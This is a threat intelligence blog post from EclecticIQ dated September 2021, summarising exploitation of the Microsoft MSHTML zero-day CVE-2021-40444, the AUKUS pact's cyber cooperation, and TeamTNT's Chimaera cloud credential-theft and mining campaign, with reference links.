EclecticIQ
nav-solutions

Learn how EclecticIQ can help you address your specific challenges – by team and by need – and improve your overall security posture.

Solutions overview

Our Ecosystem

An ecosystem supporting our customers' intelligence-led proactive cybersecurity needs with collaborative partner programs delivering world-class joint solutions. 

Partner Program

Partner with EclecticIQ to bring valuable and innovative security solutions and services to end users. Open to all partner types, including technology developers, service providers, resellers, and community.

Our Partnerships

We partner with the world's premier technology and solution providers to support all phases of your cybersecurity needs. Explore all our partners' solutions and offerings to build and extend your cyber defense ecosystem.

EclecticIQ Resources

We are committed to increasing the knowledge and capabilities of the cybersecurity community through our research & analysis efforts and open source projects.

Browse Resources

Learn more about our technology, solutions and services, and stay updated on the cyber threat landscape with our research reports, webinars and other information.

Open Source Projects

We are proud to be an active member in the open source community and to help develop and advance progress of security technology. Learn more about contributions or go directly to our GitHub page.

nav-solutions

Learn how EclecticIQ can help you address your specific challenges – by team and by need – and improve your overall security posture.

Solutions overview

Our Ecosystem

An ecosystem supporting our customers' intelligence-led proactive cybersecurity needs with collaborative partner programs delivering world-class joint solutions. 

Partner Program

Partner with EclecticIQ to bring valuable and innovative security solutions and services to end users. Open to all partner types, including technology developers, service providers, resellers, and community.

Our Partnerships

We partner with the world's premier technology and solution providers to support all phases of your cybersecurity needs. Explore all our partners' solutions and offerings to build and extend your cyber defense ecosystem.

EclecticIQ Resources

We are committed to increasing the knowledge and capabilities of the cybersecurity community through our research & analysis efforts and open source projects.

Browse Resources

Learn more about our technology, solutions and services, and stay updated on the cyber threat landscape with our research reports, webinars and other information.

Open Source Projects

We are proud to be an active member in the open source community and to help develop and advance progress of security technology. Learn more about contributions or go directly to our GitHub page.

nav-solutions

Learn how EclecticIQ can help you address your specific challenges – by team and by need – and improve your overall security posture.

Solutions overview

Our Ecosystem

An ecosystem supporting our customers' intelligence-led proactive cybersecurity needs with collaborative partner programs delivering world-class joint solutions. 

Partner Program

Partner with EclecticIQ to bring valuable and innovative security solutions and services to end users. Open to all partner types, including technology developers, service providers, resellers, and community.

Our Partnerships

We partner with the world's premier technology and solution providers to support all phases of your cybersecurity needs. Explore all our partners' solutions and offerings to build and extend your cyber defense ecosystem.

EclecticIQ Resources

We are committed to increasing the knowledge and capabilities of the cybersecurity community through our research & analysis efforts and open source projects.

Browse Resources

Learn more about our technology, solutions and services, and stay updated on the cyber threat landscape with our research reports, webinars and other information.

Open Source Projects

We are proud to be an active member in the open source community and to help develop and advance progress of security technology. Learn more about contributions or go directly to our GitHub page.

nav-solutions

Learn how EclecticIQ can help you address your specific challenges – by team and by need – and improve your overall security posture.

Solutions overview

Our Ecosystem

An ecosystem supporting our customers' intelligence-led proactive cybersecurity needs with collaborative partner programs delivering world-class joint solutions. 

Partner Program

Partner with EclecticIQ to bring valuable and innovative security solutions and services to end users. Open to all partner types, including technology developers, service providers, resellers, and community.

Our Partnerships

We partner with the world's premier technology and solution providers to support all phases of your cybersecurity needs. Explore all our partners' solutions and offerings to build and extend your cyber defense ecosystem.

EclecticIQ Resources

We are committed to increasing the knowledge and capabilities of the cybersecurity community through our research & analysis efforts and open source projects.

Browse Resources

Learn more about our technology, solutions and services, and stay updated on the cyber threat landscape with our research reports, webinars and other information.

Open Source Projects

We are proud to be an active member in the open source community and to help develop and advance progress of security technology. Learn more about contributions or go directly to our GitHub page.

AUKUS TeamTNT Microsoft Exploit

EclecticIQ Threat Research Team September 27, 2021

Exploit Tools and Targets: Microsoft Zero-Day CVE-2021-40444 will Almost Certainly Continue to be Exploited Moving Forward

Microsoft, along with analysts at Mandiant, discovered a new zero-day (CVE-2021-40444) being leveraged in targeted attacks (1). CVE-2021-40444 is a remote code execution (RCE) vulnerability in MSHTML that can be used by Microsoft Office documents (2). Campaigns exploiting this vulnerability started in August 2021 and sent exploit documents downloading Cobalt Strike Beacon. The Threat actor relied on stealing credentials to move laterally. Infrastructure used in the attacks shows overlap with multiple threat actors associated with human-operated ransomware attacks. Analysts at RiskIQ have asserted with medium confidence ‘that the goal of the operators behind the zero-day may, in fact be traditional espionage’ (3).

CVE-2021-40444 will almost certainly continue to be exploited moving forward. With the effectiveness of phishing emails, Microsoft Office exploit documents have been a mainstay in threat actor toolsets for years (4). The vulnerability being RCE, already publicly weaponized (5) and usable in Microsoft Office documents gives it the traits to become a popular exploit for initial access moving forward. See the Microsoft blog for mitigation details (1) and the attached EclecticIQ JSON package for community sourced YARA rules.

Policy and Governance: AUKUS Shows a Continued Emphasis on Cyber Cooperation

The US, UK and Australia on September 15th, 2021 announced AUKUS, a joint security pact aimed at increasing security in the Asia-Pacific (6). The pact will provide Australia with nuclear propulsion technology and focus on developing Australia’s military capabilities. The U.S. and UK will also look to share their expertise in cyber, AI and quantum computing (7), allowing Australia to scale up its defensive and offensive capabilities.

Sharing cyber threat information and standards between private, public and international bodies, has and continues to be emphasized by western countries. As recently as last month, the Biden administration introduced an initiative to bolster U.S. cybersecurity capabilities by bringing together the government, enterprise and education sectors (8). The AUKUS pact shows a growing emphasis on cyber cooperation between key western allies while integrating U.S. and UK cyber capabilities with Australia to counter the emerging threats Australia and its partners face in the Asia-Pacific region (9).

Threat Actor Update: TeamTNT Returns Targeting a Wide Range of Systems

TeamTnT, a cloud-focused threat group (9) is active again, with their new campaign, Chimaera (10). The campaign targets multiple operating systems and applications with the goal of stealing cloud credentials, installing crypto mining software and enabling lateral movement. It has been active since July 25th, 2021 and so far has infected thousands of systems globally. TeamTnT use an array of custom and open-source tools to achieve their goals on the system. Some of the open-source tools TeamTnT are:

TeamTnT’s extensive use of open-source tools highlights how effective open-source capabilities are for a threat actor to achieve their goals. They reduce the barrier to entry, reduce the cost of operations, and valid tools, such as 7z, blend into the victim’s environment more effectively.

About EclecticIQ Threat Research 

EclecticIQ is a global provider of threat intelligence, hunting and response technology and services. Headquartered in Amsterdam, the EclecticIQ Threat Research team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government. 

We would love to hear from you. Please send us your feedback by emailing us at research@eclecticiq.com.

Appendix

  1. https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/
  2. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
  3. https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/
  4. https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf
  5. https://www.bbc.com/news/world-58564837
  6. https://foreignpolicy.com/2021/09/18/aukus-australia-united-states-submarines-china-really-means/
  7. https://www.whitehouse.gov/briefing-room/statements-releases/2021/08/25/fact-sheet-biden-administration-and-private-sector-leaders-announce-ambitious-initiatives-to-bolster-the-nations-cybersecurity/
  8. https://www.reuters.com/article/us-australia-cyber/australia-sees-china-as-main-suspect-in-state-based-cyberattacks-sources-say-idUKKBN23P3T5?edition-redirect=uk
  9. https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf
  10. https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera
  11. https://github.com/robertdavidgraham/masscan
  12. https://github.com/gianlucaborello/libprocesshider
  13. https://www.7-zip.org/
  14. https://github.com/b374k/b374k
  15. https://github.com/AlessandroZ/LaZagne

Receive all our latest updates

Subscribe to receive the latest EclecticIQ news, event invites, and Threat Intelligence blog posts.

3 more posts you might like

All Blog Posts (121)

Explore all topics

© 2014 – 2021 EclecticIQ B.V.
EclecticIQ. Intelligence, Hunting, Response.
Get demo